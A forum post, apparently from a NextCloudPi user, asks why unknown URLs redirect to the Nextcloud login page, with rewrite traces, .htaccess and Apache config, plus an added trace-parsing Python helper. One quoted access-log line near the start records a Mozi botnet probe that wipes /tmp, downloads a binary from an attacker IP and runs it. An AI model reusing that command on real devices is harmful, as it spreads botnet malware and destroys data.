Hello,
I’m running ncpi 1.25 with fail2ban and modsecurity enabled. After checking the apache logs I saw a lot of scanning and hacking attempts, which were coming in on port 80 and redirected to 443, as configured in /etc/apache2/sites-available/000-default.conf.
localhost:80 128.14.134.134 - - [30/May/2020:17:30:54 +0200] “GET / HTTP/1.1” 302 447 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36”
localhost:80 116.114.95.100 - - [30/May/2020:18:06:16 +0200] “GET /shell?cd+/tmp;rm±rf+*;wget+http://116.114.95.100:35651/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1” 302 695 “-” “Hello, world”
So after disabling this rule (I’m accessing on https only), I realized that if I enter any URL (https://my-cloud.nsupdate.info/xxxx), it is always redirected to https://my-cloud.nsupdate.info/index.php/login.
I couldn’t find which redirect rule, either in apache configuration, or .htaccess in /var/www/nextcloud is doing this redirect.
My expectation is that a 404 error page is displayed.
Trace of the rewrite log
[Mon Jun 08 08:45:43.225677 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.225822 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^$' to uri 'xxxx'
[Mon Jun 08 08:45:43.225858 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.225889 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '.*' to uri 'xxxx'
[Mon Jun 08 08:45:43.225937 2020] [rewrite:trace5] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] setting env variable 'HTTP_AUTHORIZATION' to ''
[Mon Jun 08 08:45:43.225999 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226057 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/host-meta' to uri 'xxxx'
[Mon Jun 08 08:45:43.226091 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226150 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/host-meta\\.json' to uri 'xxxx'
[Mon Jun 08 08:45:43.226183 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226213 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/webfinger' to uri 'xxxx'
[Mon Jun 08 08:45:43.226276 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226335 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/nodeinfo' to uri 'xxxx'
[Mon Jun 08 08:45:43.226367 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226501 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/carddav' to uri 'xxxx'
[Mon Jun 08 08:45:43.226536 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226565 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/caldav' to uri 'xxxx'
[Mon Jun 08 08:45:43.226596 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226624 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^remote/(.*)' to uri 'xxxx'
[Mon Jun 08 08:45:43.226683 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226712 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^(?:build|tests|config|lib|3rdparty|templates)/.*' to uri 'xxxx'
[Mon Jun 08 08:45:43.226773 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226831 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^(?:\\.|autotest|occ|issue|indie|db_|console).*' to uri 'xxxx'
[Mon Jun 08 08:45:43.226862 2020] [rewrite:trace1] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] pass through /var/www/nextcloud/xxxx
[Mon Jun 08 08:45:43.227114 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9489b0/initial/redir#1] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/ ->
[Mon Jun 08 08:45:43.227176 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9489b0/initial/redir#1] [perdir /var/www/nextcloud/] applying pattern '^$' to uri ''
.htaccess in /var/www/nextcloud
<IfModule mod_headers.c>
<IfModule mod_setenvif.c>
<IfModule mod_fcgid.c>
SetEnvIfNoCase ^Authorization$ "(.+)" XAUTHORIZATION=$1
RequestHeader set XAuthorization %{XAUTHORIZATION}e env=XAUTHORIZATION
</IfModule>
<IfModule mod_proxy_fcgi.c>
SetEnvIfNoCase Authorization "(.+)" HTTP_AUTHORIZATION=$1
</IfModule>
</IfModule>
<IfModule mod_env.c>
# Add security and privacy related headers
Header always set Referrer-Policy "no-referrer"
Header always set X-Content-Type-Options "nosniff"
Header always set X-Download-Options "noopen"
Header always set X-Frame-Options "SAMEORIGIN"
Header always set X-Permitted-Cross-Domain-Policies "none"
Header always set X-Robots-Tag "none"
Header always set X-XSS-Protection "1; mode=block"
SetEnv modHeadersAvailable true
</IfModule>
# Add cache control for static resources
<FilesMatch "\.(css|js|svg|gif)$">
Header set Cache-Control "max-age=15778463"
</FilesMatch>
# Let browsers cache WOFF files for a week
<FilesMatch "\.woff2?$">
Header set Cache-Control "max-age=604800"
</FilesMatch>
</IfModule>
<IfModule mod_php7.c>
php_value mbstring.func_overload 0
php_value default_charset 'UTF-8'
php_value output_buffering 0
<IfModule mod_env.c>
SetEnv htaccessWorking true
</IfModule>
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} DavClnt
RewriteRule ^$ /remote.php/webdav/ [L,R=302]
RewriteRule .* - [env=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteRule ^\.well-known/host-meta /public.php?service=host-meta [QSA,L]
RewriteRule ^\.well-known/host-meta\.json /public.php?service=host-meta-json [QSA,L]
RewriteRule ^\.well-known/webfinger /public.php?service=webfinger [QSA,L]
RewriteRule ^\.well-known/nodeinfo /public.php?service=nodeinfo [QSA,L]
RewriteRule ^\.well-known/carddav /remote.php/dav/ [R=301,L]
RewriteRule ^\.well-known/caldav /remote.php/dav/ [R=301,L]
RewriteRule ^remote/(.*) remote.php [QSA,L]
RewriteRule ^(?:build|tests|config|lib|3rdparty|templates)/.* - [R=404,L]
RewriteCond %{REQUEST_URI} !^/\.well-known/(acme-challenge|pki-validation)/.*
RewriteRule ^(?:\.|autotest|occ|issue|indie|db_|console).* - [R=404,L]
</IfModule>
<IfModule mod_mime.c>
AddType image/svg+xml svg svgz
AddEncoding gzip svgz
</IfModule>
<IfModule mod_dir.c>
DirectoryIndex index.php index.html
</IfModule>
AddDefaultCharset utf-8
Options -Indexes
<IfModule pagespeed_module>
ModPagespeed Off
</IfModule>
#### DO NOT CHANGE ANYTHING ABOVE THIS LINE ####
ErrorDocument 403 /
ErrorDocument 404 /
/etc/apache2/sites-enabled/nextcloud.conf
<IfModule mod_ssl.c>
<VirtualHost _default_:443>
DocumentRoot /var/www/nextcloud
ServerName my-cloud.nsupdate.info
CustomLog /var/log/apache2/nc-access.log combined
ErrorLog /var/log/apache2/nc-error.log
SSLEngine on
SSLCertificateFile /etc/letsencrypt/live/my-cloud.nsupdate.info/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/my-cloud.nsupdate.info/privkey.pem
SecRuleEngine On
</VirtualHost>
<Directory /var/www/nextcloud/>
Options +FollowSymlinks
AllowOverride All
<IfModule mod_dav.c>
Dav off
</IfModule>
LimitRequestBody 0
SSLRenegBufferSize 10486000
</Directory>
</IfModule>
Some of these scans were finally blocked by fail2ban via “apache-postflood”. My modsecurity rules were probably not correctly set at that time, which could explain why they were not blocked sooner by modsecurity.
Is the current behaviour normal - should any non-existent page be redirected to index.php/login?
If not, how can it be changed?
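To read a rewrite:trace excerpt like the one above, here is an added helper (not part of the original post) that groups the trace lines by request id, lists the patterns tried and reports whether a RewriteRule issued the redirect or whether the request was passed through and a later internal redirect (an `.../initial/redir#N` request id, which is what `ErrorDocument 404 /` produces) took over. The sample trace, pid/tid, request ids, client IP and hostname are constructed.

```python
import re
from collections import OrderedDict

# Constructed sample in the shape of the rewrite:trace excerpt in the post
# (pid/tid, request ids, client IP and hostname are made up).
SAMPLE_TRACE = """\
[Mon Jun 08 08:45:43.225822 2020] [rewrite:trace3] [pid 1:tid 2] mod_rewrite.c(483): [client 192.0.2.10:51725] 192.0.2.10 - - [cloud.example/sid#1][rid#a1/initial] [perdir /var/www/nextcloud/] applying pattern '^$' to uri 'xxxx'
[Mon Jun 08 08:45:43.225889 2020] [rewrite:trace3] [pid 1:tid 2] mod_rewrite.c(483): [client 192.0.2.10:51725] 192.0.2.10 - - [cloud.example/sid#1][rid#a1/initial] [perdir /var/www/nextcloud/] applying pattern '.*' to uri 'xxxx'
[Mon Jun 08 08:45:43.226862 2020] [rewrite:trace1] [pid 1:tid 2] mod_rewrite.c(483): [client 192.0.2.10:51725] 192.0.2.10 - - [cloud.example/sid#1][rid#a1/initial] [perdir /var/www/nextcloud/] pass through /var/www/nextcloud/xxxx
[Mon Jun 08 08:45:43.227176 2020] [rewrite:trace3] [pid 1:tid 2] mod_rewrite.c(483): [client 192.0.2.10:51725] 192.0.2.10 - - [cloud.example/sid#1][rid#b2/initial/redir#1] [perdir /var/www/nextcloud/] applying pattern '^$' to uri ''
"""

RID_RE = re.compile(r"\[rid#(?P<rid>[^\]]+)\]")
PATTERN_RE = re.compile(r"applying pattern '(?P<pat>.*)' to uri '(?P<uri>.*)'")
PASS_RE = re.compile(r"pass through (?P<path>\S+)")


def summarize_rewrite_trace(text):
    """Group trace lines by request id; record patterns tried and the outcome."""
    requests = OrderedDict()
    for line in text.splitlines():
        m = RID_RE.search(line)
        if not m:
            continue
        entry = requests.setdefault(m.group("rid"), {"patterns": [], "uri": None, "outcome": None})
        pm = PATTERN_RE.search(line)
        if pm:
            entry["patterns"].append(pm.group("pat"))
            entry["uri"] = pm.group("uri")
        elif PASS_RE.search(line):
            entry["outcome"] = "pass through"      # trace1: no RewriteRule matched
        elif "redirect to" in line:
            entry["outcome"] = "rewrite redirect"  # trace1 message when an R= rule fires
    return requests


def diagnose(requests):
    """Explain where a redirect comes from, based on the grouped trace."""
    initial = [r for r in requests if r.endswith("/initial")]
    internal = [r for r in requests if "/redir#" in r]
    if not initial:
        return "no initial request found"
    first = requests[initial[0]]
    if first["outcome"] == "rewrite redirect":
        return "a RewriteRule with R= issued the redirect"
    if first["outcome"] == "pass through" and internal:
        return ("no RewriteRule matched; the request was passed through and Apache then "
                "ran an internal redirect (rid .../redir#N), as ErrorDocument with a local path does")
    return "no redirect seen in the trace"
```

Run it over the real trace with `diagnose(summarize_rewrite_trace(open("rewrite.log").read()))`; the `redir#1` sub-request with an empty URI is the `/` that `ErrorDocument 404 /` hands to index.php.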